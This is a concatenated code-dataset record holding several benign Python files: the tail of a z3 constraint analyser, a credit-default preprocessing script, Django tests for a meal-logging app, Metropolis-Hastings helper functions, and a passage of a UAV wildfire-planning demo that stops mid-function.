self.all_constraints.extend(body_ins)
body = self.to_z3(obj.body) # explores the then-branch and creates the constraints
orelse = []
if obj.orelse:
self.all_constraints = all_constraints_backup.copy() # reset
self.all_constraints.append(z3.Not(test)) # condition to get in here
self.all_constraints.extend(else_ins)
orelse = self.to_z3(obj.orelse)
self.all_constraints = all_constraints_backup.copy() # reset again
# standard behaviour (unfortunately we have to copy)
body_outs = []
else_outs = []
ifstmt = z3.If(test,
z3.And(body_ins + body + body_outs),
z3.And(else_ins + orelse + else_outs))
return ifstmt
def to_z3_astCall(self, obj):
func_name = SH.get_attribute_string(obj.func)
if func_name == "min":
val1 = self.to_z3(obj.args[0])
val2 = self.to_z3(obj.args[1])
test = val1 <= val2
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"min function at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
return super().to_z3_astCall(obj)
if func_name == "max":
val1 = self.to_z3(obj.args[0])
val2 = self.to_z3(obj.args[1])
test = val1 >= val2
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"Max function at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
return super().to_z3_astCall(obj)
logger.error("You will probably see wrong results, because the analysis does not work for function calls yet.")
return super().to_z3_astCall(obj)
| 38.985782
| 119
| 0.633479
|
1d3e0cf9f28c9e6c82f8fc396e535cd7c100ab0e
| 4,599
|
py
|
Python
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 2
|
2021-11-23T01:07:30.000Z
|
2021-12-09T20:09:10.000Z
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 23
|
2021-11-19T19:30:38.000Z
|
2021-12-13T22:43:57.000Z
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 5
|
2021-11-19T04:43:36.000Z
|
2021-11-20T01:09:58.000Z
|
#!/usr/bin/env python
# Author: Taiwo Owoseni
# date: 2021-11-23
"""Transforms csv file and output transformed data to directory as csv file.
Usage: src/transform_data.py --input_path=<input_path> --out_dir =<out_dir>
Options:
--input_path=<input_path> Path (filepath) to cleaned data (script supports only csv)
--out_dir=<out_dir> Path (directory) to save transformed train and test data
"""
import numpy as np
import os
import pandas as pd
from docopt import docopt
from sklearn.compose import make_column_transformer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder,StandardScaler
opt = docopt(__doc__)
def save_file(path_dir, file_name, processed_data ):
"""
Saves file.
This function creates a new file by
saving it to the specified path.
Parameters
----------
path_dir : str
The path to save the file.
file_name: str
The file name of the document.
processed_data: pd.DataFrame
The object to be saved.
Examples
--------
save_file('data/split', 'train_data', train_df)
"""
file_path = os.path.join(path_dir, file_name)
try:
processed_data.to_csv(file_path, index = False, encoding='utf-8')
except:
os.makedirs(os.path.dirname(file_path))
processed_data.to_csv(file_path, index = False, encoding='utf-8')
def read_data(file_path):
"""
Reads a csv file from path.
Parameters
----------
file_path : str
The path of the file.
Returns
-------
data : pd.DataFrame
A csv file
Examples
--------
read_file('data/split/train.csv')
"""
try:
abs_path = os.path.abspath(file_path)
except FileNotFoundError:
raise ("Absolute path to {input_file} not found in home directory")
else:
data = pd.read_csv(abs_path)
return data
def main(input_path, out_dir):
filename, file_extension = os.path.splitext(input_path)
# assertion tests
assert file_extension == ".csv", f"Wrong exteension type. Extension has to be {file_extension}"
data = read_data(input_path)
column_list = ['LIMIT_BAL', 'SEX', 'EDUCATION', 'MARRIAGE', 'AGE', 'PAY_0', 'PAY_2',
'PAY_3', 'PAY_4', 'PAY_5', 'PAY_6', 'BILL_AMT1', 'BILL_AMT2',
'BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6', 'PAY_AMT1',
'PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6',
'DEFAULT_PAYMENT_NEXT_MONTH']
assert list(data.columns) == column_list, f"Wrong Data Frame : Features should be {column_list}"
X = data.drop(columns="DEFAULT_PAYMENT_NEXT_MONTH")
y = data["DEFAULT_PAYMENT_NEXT_MONTH"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=123)
numeric_features = ['LIMIT_BAL', 'AGE', 'BILL_AMT1', 'BILL_AMT2',
'BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6', 'PAY_AMT1',
'PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6']
categorical_features = ['SEX', 'MARRIAGE', 'PAY_0', 'PAY_2',
'PAY_3', 'PAY_4', 'PAY_5', 'PAY_6' ]
ordinal_features = ['EDUCATION']
preprocessor = make_column_transformer(
(StandardScaler(),numeric_features),
(OneHotEncoder(drop="if_binary", sparse=False,
handle_unknown="ignore", dtype="int"),
categorical_features),
("passthrough", ordinal_features)
)
preprocessed_X_train = preprocessor.fit_transform(X_train)
preprocessed_X_test = preprocessor.transform(X_test)
# get the column names of the preprocessed data
column_names = np.concatenate(
[np.array(numeric_features),
preprocessor.named_transformers_['onehotencoder'].get_feature_names_out(),
np.array(ordinal_features)]
)
trans_train_data = pd.DataFrame(
data = preprocessed_X_train,
columns = column_names
)
trans_test_data = pd.DataFrame(
data = preprocessed_X_test,
columns = column_names
)
trans_train_data["DEFAULT_PAYMENT_NEXT_MONTH"] = y_train.values
trans_test_data["DEFAULT_PAYMENT_NEXT_MONTH"] = y_test.values
# save transformed data after splitting
save_file(out_dir, "transformed_train.csv", trans_train_data)
save_file(out_dir,"transformed_test.csv", trans_test_data)
if __name__ == "__main__":
main(opt["--input_path"], opt["--out_dir"])
| 31.285714
| 100
| 0.642096
|
22a9957df9b7d88d7b0855d9d3e65958887fd09f
| 13,208
|
py
|
Python
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 1
|
2021-03-18T00:12:09.000Z
|
2021-03-18T00:12:09.000Z
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 104
|
2020-09-09T18:52:33.000Z
|
2020-12-16T15:17:56.000Z
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 1
|
2021-03-17T21:35:51.000Z
|
2021-03-17T21:35:51.000Z
|
from datetime import datetime, timedelta
from decimal import Decimal
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from nutrihacker.models import DailyLog, MealLog, MealFood, Food
# populates temp database
def create_foods():
foods = {
'sweetroll': ['Sweetroll', Decimal('38.20'), Decimal('200.00'), Decimal('5.40'), Decimal('10.00'), Decimal('0.00'),
Decimal('14.00'), Decimal('1.10')
],
'mubcrablegs': ['Mudcrab Legs', Decimal('54.90'), Decimal('150.00'), Decimal('2.10'), Decimal('340.00'), Decimal('20.00'),
Decimal('2.00'), Decimal('9.00')
],
'eidarcheese': ['Eidar Cheese', Decimal('100.00'), Decimal('90.00'), Decimal('80.00'), Decimal('70.00'), Decimal('60.00'),
Decimal('50.00'), Decimal('40.00')
],
'soulhusk': ['Soul Husk', Decimal('10.00'), Decimal('20.00'), Decimal('30.00'), Decimal('40.00'), Decimal('50.00'),
Decimal('60.00'), Decimal('70.00')
],
'mammothsteak': ['Mammoth Steak', Decimal('20.00'), Decimal('40.00'), Decimal('60.00'), Decimal('80.00'), Decimal('100.00'),
Decimal('120.00'), Decimal('140.00')
],
'horkerstew': ['Horker Stew', Decimal('110.00'), Decimal('120.00'), Decimal('130.00'), Decimal('140.00'), Decimal('150.00'),
Decimal('160.00'), Decimal('170.00')
],
'garlicbread': ['Garlic Bread', Decimal('77.70'), Decimal('66.60'), Decimal('55.50'), Decimal('44.40'), Decimal('33.30'),
Decimal('22.20'), Decimal('11.10')
],
'spicedwine': ['Spiced Wine', Decimal('100.00'), Decimal('98.00'), Decimal('86.00'), Decimal('74.00'), Decimal('62.00'),
Decimal('50.00'), Decimal('48.00')
],
}
for key in foods:
Food.objects.create(
name=foods[key][0],
servingSize=foods[key][1],
calories=foods[key][2],
totalFat=foods[key][3],
cholesterol=foods[key][4],
sodium=foods[key][5],
totalCarb=foods[key][6],
protein=foods[key][7]
)
# creates and logs in a user
def login_user(client):
name = 'test'
pword = 'djangotest159'
user = User.objects.create_user(name, password=pword)
client.login(username=name, password=pword)
return user
# creates a log with three meals (2:3:3 number of foods)
def create_one_log(client):
create_foods()
user = login_user(client)
now = datetime.now().replace(second=0, microsecond=0)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
}
)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'extra_field_count':2
}
)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=6).id,
'portions1':Decimal('1.6'),
'food2':Food.objects.get(id=7).id,
'portions2':Decimal('1.7'),
'food3':Food.objects.get(id=8).id,
'portions3':Decimal('1.8'),
'extra_field_count':2
}
)
return user, now
class LogCreateTests(TestCase):
# tests successful creation of a log using DailyLog, MealLog, and MealFood
def test_create_log(self):
create_foods()
user = login_user(self.client)
now = datetime.now().replace(second=0, microsecond=0)
# test creating a log with one food
food1 = Food.objects.get(id=1)
portions1 = Decimal('1.5')
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that the correct logs were created and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.all(), ['<MealLog: ' + str(now) + '>'])
self.assertQuerysetEqual(MealFood.objects.all(), ['<MealFood: ' + str(now) + ' ' + food1.name + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# test creating another MealLog of multiple foods for the same day
food2 = Food.objects.get(id=2)
portions2 = Decimal('1')
food3 = Food.objects.get(id=3)
portions3 = Decimal('0.75')
food4 = Food.objects.get(id=4)
portions4 = Decimal('2.5')
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':food2.id,
'portions1':portions2,
'food2':food3.id,
'portions2':portions3,
'food3':food4.id,
'portions3':portions4,
'extra_field_count':2
},
follow=True
)
# builds a list that mimics a QuerySet
mealfood_qs = []
for i in range(4):
mealfood_qs.append('<MealFood: ' + str(now) + ' ' + Food.objects.get(id=i+1).name + '>')
# confirm that the correct logs were created and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.all(), ['<MealLog: ' + str(now) + '>',
'<MealLog: ' + str(now) + '>'], ordered=False)
self.assertQuerysetEqual(MealFood.objects.all(), mealfood_qs, ordered=False)
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# tests invalid future dates and times
def test_create_future_log_not_allowed(self):
create_foods()
user = login_user(self.client)
now = datetime.now().replace(second=0, microsecond=0)
food1 = Food.objects.get(id=1)
portions1 = Decimal('1.5')
# test creating a log 30 minutes in the future
future1 = now + timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':future1.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that no logs were created and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), [])
self.assertQuerysetEqual(MealLog.objects.all(), [])
self.assertQuerysetEqual(MealFood.objects.all(), [])
self.assertEqual(response.status_code, 200)
# test creating a log 1 day in the future
future2 = now + timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':future2.date(),
'time':now.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that no logs were created and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), [])
self.assertQuerysetEqual(MealLog.objects.all(), [])
self.assertQuerysetEqual(MealFood.objects.all(), [])
self.assertEqual(response.status_code, 200)
class LogUpdateTests(TestCase):
def test_update_log_date_time(self):
user, now = create_one_log(self.client)
# test updating a log to 30 minutes in the past
past1 = now - timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':past1.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that MealLog time was changed and user redirected to correct page
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(past1) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# test updating a log to 1 day in the past
past2 = now - timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':2}),
{
'date':past2.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'extra_field_count':2
},
follow=True
)
# confirm that a new DailyLog was created, MealLog date was changed, and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.filter(id=2), ['<DailyLog: ' + str(past2.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.filter(id=2), ['<MealLog: ' + str(past2) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':2})))
# test updating a log's date to an existing DailyLog
past3 = now - timedelta(days=2)
dl = DailyLog.create(user, past3.date()) # create a DailyLog using past3
dl.save()
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':3}),
{
'date':past3.date(),
'time':now.time(),
'food1':Food.objects.get(id=6).id,
'portions1':Decimal('1.6'),
'food2':Food.objects.get(id=7).id,
'portions2':Decimal('1.7'),
'food3':Food.objects.get(id=8).id,
'portions3':Decimal('1.8'),
'extra_field_count':2
},
follow=True
)
# confirm that MealLog date was changed to existing DailyLog, and user redirected to correct page
self.assertQuerysetEqual(MealLog.objects.filter(id=3), ['<MealLog: ' + str(past3) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':dl.id})))
def test_update_log_food_portions(self):
user, now = create_one_log(self.client)
# test updating by changing the food and portions for existing fields and adding more food+portions
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'food4':Food.objects.get(id=6).id,
'portions4':Decimal('1.6'),
'extra_field_count':3
},
follow=True
)
# builds a list that mimics a QuerySet
mealfood_qs = []
for i in range(4):
mealfood_qs.append('<MealFood: ' + str(now) + ' ' + Food.objects.get(id=i+3).name + '>')
mealfood_list = MealFood.objects.filter(meal_log__id=1) # get MealFood list for the MealLog
portions = Decimal('1.3')
for mealfood in mealfood_list:
# confirm that each MealFood's portions field is correct
self.assertEqual(mealfood.portions, portions)
portions += Decimal('0.1')
# confirm that MealFood list is correct, and user redirected to correct page
self.assertQuerysetEqual(mealfood_list, mealfood_qs, ordered=False)
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# tests invalid future dates and times
def test_update_to_future_date_not_allowed(self):
user, now = create_one_log(self.client)
# test updating a log to 30 minutes in the future
future1 = now + timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':future1.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that the MealLog time did not change and an error was raised
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(now) + '>'])
self.assertEqual(response.status_code, 200)
future2 = now + timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':future2.date(),
'time':now.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that no DailyLog was created, MealLog date did not change, and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(now) + '>'])
self.assertEqual(response.status_code, 200)
class LogModelTests(TestCase):
# tests the get_total function for DailyLog, MealLog, MealFood
# DL's get_total is dependent on ML's which is dependent on MF's, so testing DL's means testing all of them
def test_get_total(self):
create_one_log(self.client)
dl = DailyLog.objects.get(id=1)
total = {
'calories':0,
'totalFat':0,
'cholesterol':0,
'sodium':0,
'totalCarb':0,
'protein':0
}
# calculate the total nutrients for the daily log
portions = Decimal('1.1')
for mf in MealFood.objects.all():
# get the nutrients of each food
nutrients = mf.food.get_nutrients()
# add the nutrients multiplied by portions
for key in total:
total[key] += nutrients[key] * portions
# increment portions as they were hardcoded
portions += Decimal('0.1')
# test the get_total calculation against hardcoded calculation
self.assertEqual(dl.get_total(), total)
| 32.53202
| 126
| 0.663462
|
af33a31658688310d5af6b0e8c8d4b5a68afd40c
| 3,374
|
py
|
Python
|
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
"""
Some helpful functions to run markov chain simulations.
"""
import scipy.stats as st
import numpy as np
import scipy as sp
import pandas as pd
import matplotlib.pyplot as plt
import copy
import time
from DatasetGenerator import *
def vect_to_S(x):
"""
Compute the subset S of cities corresponding to the vector encoding
Parameters
----------
x: ndarray of shape (n,)
Returns
-------
S: ndarray, the subset of corresponding cities
"""
return np.nonzero(x)[0]
def f(S, lambda_, data):
"""
Compute the objective function (that we want to maximize).
Parameters
----------
S: subset of P({0,..., n-1}) as an array of shape (k,) with k the size of S
lambda_: float, the fixed value of the deployment cost
data: Dataset
Returns
-------
f: The evaluated objective function.
"""
n, coords, pop, dists = data.N, data.x, data.v, data.d
# consider only coordinates of cities in S
pop_S = pop[S]
max_dist_S = np.max(dists[S,:][:,S]) if len(S) > 1 else 0
f = np.sum(pop_S) - (1/4) * lambda_ * n * np.pi * (max_dist_S)**2
return f
def max_distance(x, dists, max_cities=False):
"""
Compute the pairwise distance between cities represented by x
and return the maximum distance among all of them.
Parameters
----------
x: ndarray of shape (n,)
dists: ndarray, the matrix distance between all cities in the working dataset
max_cities: boolean, whether to return the city couples realising the argmax
Return
------
max_dist: float, the maximum distance among all pairwise distances between cities represented by x
city_maxs: list of tuples (returned if max_cities == True), the couple of cities that intervene in the maximum distance
"""
S_x = vect_to_S(x)
max_dist = np.max(dists[S_x,:][:,S_x]) if len(S_x) > 1 else 0
if not max_cities:
return max_dist
# also return the couple of cities realising the maximum distance
ind_maxs = np.argwhere(dists[S_x,:][:,S_x] == max_dist if len(S_x) > 1 else 0) # indices in dist matrice of the max distance
city_maxs = np.zeros(ind_maxs.shape[0], dtype=tuple) # change the indices to the city number
for n, (i, j) in enumerate(ind_maxs):
city_maxs[n] = (S_x[i], S_x[j])
return max_dist, city_maxs
### Function for the competition:
def preprocessing_data(csv_file):
"""
Function used to load the data from the csv file to panda
"""
#Importing the csv file as Dataframe
df = pd.read_csv(csv_file, index_col="city id")
#Computing starting state
starting_state = np.zeros(len(df))
starting_state[df['normalized population'] == df['normalized population'].max()] = 1
#Converting the df to a Dataset object
data = Dataset_competition(N=len(df))
data.x = df[['position x', 'position y']].to_numpy()
data.v = df['normalized population'].to_numpy()
data.d = sp.spatial.distance.cdist(data.x, data.x, 'euclidean')
return starting_state, data
def submission(csv_file, Sapprox, save_file_name):
#Importing the csv file as Dataframe
df_submission = pd.read_csv(csv_file, usecols = ["city id"])
df_submission['1/0 variable'] = 0
df_submission['1/0 variable'][Sapprox] = 1
df_submission.to_csv(save_file_name, index=False)
| 29.33913
| 129
| 0.658566
|
73f281c4de5e4799fbd2108224e9d438e948dadb
| 17,729
|
py
|
Python
|
python/fire_rs/planning/demo_winterpaper.py
|
arthur-bit-monnot/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 13
|
2018-11-19T15:51:23.000Z
|
2022-01-16T11:24:21.000Z
|
python/fire_rs/planning/demo_winterpaper.py
|
fire-rs-laas/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 14
|
2017-10-12T16:19:19.000Z
|
2018-03-12T12:07:56.000Z
|
python/fire_rs/planning/demo_winterpaper.py
|
fire-rs-laas/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 4
|
2018-03-12T12:28:55.000Z
|
2021-07-07T18:32:17.000Z
|
# Copyright (c) 2017, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This demo draws result figures for the winter2017 paper"""
import logging
import numpy as np
import matplotlib
import matplotlib.cm
import fire_rs.uav_planning as op
import fire_rs.neptus_interface as neptus
import fire_rs.firemapping as fmapping
import fire_rs.geodata.display
from fire_rs.firemodel import propagation
from fire_rs.geodata.geo_data import TimedPoint, GeoData
from fire_rs.planning.planning import FireMapper, FlightConf, Planner, PlanningEnvironment, \
UAVConf, Waypoint
from fire_rs.planning.display import TrajectoryDisplayExtension, plot_plan_trajectories
logging.basicConfig(level=logging.DEBUG)
def SAOP_conf(min_time: float, max_time: float) -> 'dict':
# Write down the desired VNS configuration
conf_vns = {
"full": {
"max_restarts": 5,
"max_time": 60.0,
"neighborhoods": [
{"name": "dubins-opt",
"max_trials": 100,
"generators": [
{"name": "MeanOrientationChangeGenerator"},
{"name": "RandomOrientationChangeGenerator"},
{"name": "FlipOrientationChangeGenerator"}]},
{"name": "one-insert",
"max_trials": 50,
"select_arbitrary_trajectory": True,
"select_arbitrary_position": False},
]
}
}
conf = {
'min_time': min_time,
'max_time': max_time,
'save_every': 0,
'save_improvements': False,
'discrete_elevation_interval': 0,
'vns': conf_vns['full']
}
conf['vns']['configuration_name'] = 'full'
return conf
def wp_insertion() -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with an small fire. Overlay arrows indicating fire propagation direction"""
# Geographic environment (elevation, landcover, wind...)
wind = (2., 0.)
area = ((480000.0, 480200.0), (6210000.0, 6210200.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
ignition_points = [
TimedPoint(area[0][0], area[1][0], 0),
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
fire1 = fire.ignitions()
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
)
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# print(env.raster.x_offset)
# gdd.axis.set_xticks(np.arange(area[0][0]-25, area[0][1], 22.22))
# gdd.axis.set_yticks(np.arange(area[1][0]-25, area[1][1], 22.22))
# gdd.axis.grid(True)
gdd.axes.tick_params(
axis='both', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
left='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelleft='off', # ticks along the bottom edge are off
labelbottom='off') # labels along the bottom edge are off
gdd.axes.set_xlabel("")
gdd.axes.set_ylabel("")
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_shade(with_colorbar=False, geodata=fire1, vmin=0, vmax=120*60, cmap=matplotlib.cm.Reds)
gdd.legend()
return gdd
def detail_case_figure(wind_speed=5., wind_dir=0.) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with an small fire
we can make a zoom and observe a dubinswind path and observed cells."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
wind_xy = (wind[0] * np.cos(wind[1]), wind[0] * np.sin(wind[1]))
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=10, wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 2000.0, area[1][0] + 2000.0, 0),
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
# Configure some flight
base_wp = Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.)
start_t = 120 * 60
uav = UAVConf.x8()
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind_xy),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
gdd.axes.grid(True)
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
executed_path_1 = sr_1.final_plan().trajectories()[0].sampled_with_time(step_size=10)
fmapper.observe(executed_path_1, pl.flights[0].uav)
gdd.TrajectoryDisplayExtension.draw_observation_map(obs_map=fmapper.observed, layer='ignition',
color='gray')
gdd.TrajectoryDisplayExtension.draw_observation_map(obs_map=fmapper.firemap, layer='ignition',
color='green')
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_segments=False, draw_flighttime_path=False, colors=[colors[i]],
labels=None)
gdd.legend()
return gdd
def singleuav_case_figure(wind_speed=5., wind_dir=0.,
uav_w_speed=None) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with wind, 1 UAV, 1 fire."""
# Geographic environment (elevation, landcover, wind...)
uav_w_speed = wind_speed if uav_w_speed is None else uav_w_speed
wind = (uav_w_speed, wind_dir)
wind_xy = (wind[0] * np.cos(wind[1]), wind[0] * np.sin(wind[1]))
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0] * 2, wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 2000.0, area[1][0] + 2000.0, 0),
]
logging.info("Start of propagation")
